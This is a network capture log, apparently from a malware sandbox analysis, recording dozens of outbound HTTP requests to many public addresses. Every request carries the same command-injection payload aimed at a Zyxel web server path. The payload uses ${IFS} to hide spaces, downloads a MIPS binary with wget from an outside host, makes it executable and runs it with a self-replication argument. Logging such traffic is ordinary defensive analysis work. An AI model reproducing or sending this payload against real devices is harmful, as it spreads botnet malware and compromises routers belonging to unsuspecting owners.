                                              Jan 29, 2024 07:03:52.048121929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4807192.168.2.145058017.164.26.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048172951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4808192.168.2.1453468159.12.108.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048192978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4809192.168.2.1441564177.79.171.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048226118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4810192.168.2.145785418.53.26.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048252106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4811192.168.2.1460276102.177.180.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048310995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4812192.168.2.143882075.177.174.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048348904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4813192.168.2.145682691.0.49.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048376083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4814192.168.2.1450444170.72.64.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048433065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4815192.168.2.144222868.32.172.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048454046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4816192.168.2.144953285.254.51.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048512936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4817192.168.2.1438152192.177.202.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048542976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4818192.168.2.1460866188.38.170.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048582077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4819192.168.2.145800663.52.103.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048610926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4820192.168.2.1436098187.238.115.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048662901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4821192.168.2.145034258.51.191.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048686028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4822192.168.2.1453522183.48.59.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048727989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4823192.168.2.1458984146.196.10.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048757076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4824192.168.2.145373875.109.180.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048791885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4825192.168.2.145594254.76.62.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048805952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4826192.168.2.1442272141.99.95.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048837900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4827192.168.2.1454384124.101.203.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048882961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4828192.168.2.144714054.81.117.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048914909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4829192.168.2.144321667.153.59.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048953056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4830192.168.2.1439874183.15.76.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048983097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4831192.168.2.1450760128.117.234.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049026012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4832192.168.2.1434320126.55.212.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049065113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4833192.168.2.144922477.254.192.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049108982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4834192.168.2.144003873.134.249.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049149036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4835192.168.2.143925663.186.75.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049201012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4836192.168.2.1457390221.87.218.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049228907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4837192.168.2.1448576115.148.29.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049253941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4838192.168.2.1435662187.99.167.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049294949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4839192.168.2.14601129.248.84.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049309969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4840192.168.2.1433582195.237.47.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049344063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4841192.168.2.144315277.213.16.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049377918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4842192.168.2.143991686.219.222.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049417973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4843192.168.2.144323252.18.24.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049448967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4844192.168.2.14372922.166.139.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049472094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4845192.168.2.1455324170.247.135.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049506903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4846192.168.2.1447736103.153.139.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049562931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4847192.168.2.14424102.181.21.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049593925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4848192.168.2.1434376140.214.131.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049643993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4849192.168.2.1447068205.174.100.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049681902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4850192.168.2.145737286.173.180.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049700022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4851192.168.2.144680889.157.108.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049756050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4852192.168.2.1449278117.206.51.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049798012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4853192.168.2.145322814.188.128.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049813986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4854192.168.2.143703451.173.123.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049849033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4855192.168.2.146036438.139.192.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049916983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4856192.168.2.1455470156.195.49.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049952984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4857192.168.2.145991413.208.104.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.049978018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4858192.168.2.145078824.40.64.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050024986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4859192.168.2.1443788137.43.180.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050060987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4860192.168.2.1440854218.240.192.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050090075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4861192.168.2.1451634135.210.170.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050127029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4862192.168.2.1445054143.106.102.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050177097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4863192.168.2.1438428168.69.64.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050204992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4864192.168.2.1455646133.141.237.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050255060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4865192.168.2.143955234.233.137.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050292969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4866192.168.2.1435594198.24.15.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050323009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4867192.168.2.144344238.240.72.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050364971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4868192.168.2.14335741.184.9.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050403118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4869192.168.2.1434828193.83.11.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.050437927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4870192.168.2.1455566116.191.81.206443
                                              TimestampBytes transferredDirectionData
